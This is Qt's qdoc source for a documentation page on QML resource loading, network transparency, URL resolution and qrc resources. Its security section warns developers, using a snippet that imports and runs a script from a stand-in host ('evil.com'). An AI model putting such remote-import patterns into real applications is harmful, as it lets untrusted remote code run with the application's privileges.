Qt
Internal/Contributor docs for the Qt SDK. Note: These are NOT official API docs; those are found at https://doc.qt.io/
Loading...
Searching...
No Matches
networktransparency.qdoc
Go to the documentation of this file.
1// Copyright (C) 2021 The Qt Company Ltd.
2// SPDX-License-Identifier: LicenseRef-Qt-Commercial OR GFDL-1.3-no-invariants-only
3/*!
4\page qtqml-documents-networktransparency.html
5\meta {keywords} {qmltopic}
6\title Resource Loading and Network Transparency
7\brief about loading files and resources across a network
8
9QML supports network transparency by using URLs (rather than file names) for all
10references from a QML document to other content. This means that anywhere a URL source is expected,
11QML can handle remote resources as well as local ones, for example in the following image source:
12
13\qml
14Image {
15 source: "http://www.example.com/images/logo.png"
16}
17\endqml
18
19Since a \e relative URL is the same
20as a relative file, development of QML on regular file systems remains simple:
21
22\qml
23Image {
24 source: "images/logo.png"
25}
26\endqml
27
28Network transparency is supported throughout QML, for example, both the FontLoader
29and Image elements support loading resources from a remote server.
30
31Even QML types themselves can be on the network: if the
32\l {Prototyping with the QML Runtime Tool}{qml tool} is used to load
33\tt http://example.com/mystuff/Hello.qml and that content refers to a type "World", the engine
34will load \tt http://example.com/mystuff/qmldir and resolve the type just as it would for a local file.
35For example if the qmldir file contains the line "World World.qml", it will load
36\tt http://example.com/mystuff/World.qml
37Any other resources that \tt Hello.qml referred to, usually by a relative URL, would
38similarly be loaded from the network.
39The same holds true remote JavaScript files used with \l{WorkerScript}.
40
41\warning QML and JavaScript resources must only be loaded from trusted remote locations,
42compare the notes about \l{Qt Qml and JavaScript Sources}{processing data from untrusted sources}.
43
44
45\section1 Relative vs. Absolute URLs
46
47Whenever an object has a property of type URL (QUrl), assigning a string to that
48property will actually assign an absolute URL - by resolving the string against
49the URL of the document where the string is used.
50
51For example, consider this content in \tt{http://example.com/mystuff/test.qml}:
52
53\qml
54Image {
55 source: "images/logo.png"
56}
57\endqml
58
59The \l Image source property will be assigned \tt{http://example.com/mystuff/images/logo.png},
60but while the QML is being developed, in say \tt C:\\User\\Fred\\Documents\\MyStuff\\test.qml, it will be assigned
61\tt C:\\User\\Fred\\Documents\\MyStuff\\images\\logo.png.
62
63If the string assigned to a URL is already an absolute URL, then "resolving" does
64not change it and the URL is assigned directly.
65
66
67\section1 QRC Resources
68
69One of the URL schemes built into Qt is the "qrc" scheme. This allows content to be compiled into
70the executable using \l{The Qt Resource System}. Using this, an executable can reference QML content
71that is compiled into the executable:
72
73\code
74 QQuickView *view = new QQuickView;
75 view->setUrl(QUrl("qrc:/dial.qml"));
76\endcode
77
78The content itself can then use relative URLs, and so be transparently unaware that the content is
79compiled into the executable.
80
81
82\section1 Limitations
83
84The \c import statement is only network transparent if it has an "as" clause.
85
86More specifically:
87\list
88\li \c{import "dir"} only works on local file systems
89\li \c{import libraryUri} only works on local file systems
90\li \c{import "dir" as D} works network transparently
91\li \c{import libraryUrl as U} works network transparently
92\endlist
93
94
95\section1 Implications for Application Security
96
97The QML security model is that QML content is a chain of trusted content: the user
98installs QML content that they trust in the same way as they install native Qt applications,
99or programs written with runtimes such as Python and Perl. That trust is establish by any
100of a number of mechanisms, including the availability of package signing on some platforms.
101
102In order to preserve the trust of users, QML application developers should not load
103and execute arbitrary JavaScript or QML resources. For example, consider the QML code below:
104
105\qml
106import QtQuick 2.0
107import "http://evil.com/evil.js" as Evil
108
109Component {
110 onLoaded: Evil.doEvil()
111}
112\endqml
113
114This is equivalent to downloading and executing "http://evil.com/evil.exe". \b {The QML engine
115will not prevent particular resources from being loaded}. Unlike JavaScript code that is run within a web browser, a QML application can load remote or local filesystem resources in the same way as any other native applications, so application developers must be careful in loading and executing any content.
116
117As with any application accessing other content beyond its control, a QML application should
118perform appropriate checks on any untrusted data it loads. \b {Do not, for example, use \c import, \l Loader or \l{The XMLHttpRequest JavaScript Object}{XMLHttpRequest} to load any untrusted code or content.}
119*/